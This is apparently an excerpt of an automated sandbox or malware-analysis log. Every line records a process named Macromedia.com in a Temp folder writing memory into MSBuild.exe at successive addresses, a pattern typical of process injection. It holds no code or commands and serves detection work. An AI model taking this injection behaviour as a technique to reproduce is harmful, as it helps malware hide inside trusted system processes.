Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC36B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3714
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3778
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC37DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3840
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC38A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3908
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC396C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC39D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3A34
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3A98
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3AFC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3B60
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3BC4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3C28
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3C8C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3CF0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3D54
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3DB8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3E1C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3E80
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3EE4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3F48
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC3FAC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4010
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4074
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC40D8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC413C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC41A0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4204
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4268
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC42CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4330
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4394
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC43F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC445C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC44C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4524
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4588
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC45EC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4650
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC46B4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4718
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC477C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC47E0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4844
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC48A8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC490C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4970
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC49D4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4A38
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4A9C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4B00
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4B64
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4BC8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4C2C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4C90
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4CF4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4D58
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4DBC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4E20
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4E84
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4EE8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4F4C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC4FB0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5014
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5078
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC50DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5140
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC51A4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5208
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC526C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC52D0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5334
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5398
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC53FC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5460
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC54C4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5528
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC558C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC55F0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5654
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC56B8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC571C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5780
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC57E4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5848
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC58AC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5910
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5974
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC59D8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5A3C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5AA0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5B04
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5B68
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5BCC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5C30
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5C94
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5CF8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5D5C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5DC0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5E24
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5E88
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5EEC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5F50
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC5FB4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6018
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC607C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC60E0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6144
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC61A8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC620C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6270
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC62D4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6338
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC639C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6400
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6464
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC64C8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC652C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6590
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC65F4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6658
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC66BC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6720
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6784
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC67E8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC684C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC68B0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6914
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6978
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC69DC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6A40
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6AA4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6B08
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6B6C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6BD0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6C34
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6C98
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6CFC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6D60
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6DC4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6E28
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6E8C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6EF0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6F54
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC6FB8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC701C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7080
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC70E4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7148
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC71AC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7210
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7274
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC72D8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC733C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC73A0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7404
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7468
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC74CC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7530
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7594
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC75F8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC765C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC76C0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7724
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7788
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC77EC
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7850
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC78B4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7918
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC797C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC79E0
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7A44
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7AA8
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7B0C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7B70
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7BD4
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7C38
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7C9C
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7D00
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7D64
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BC7DC8
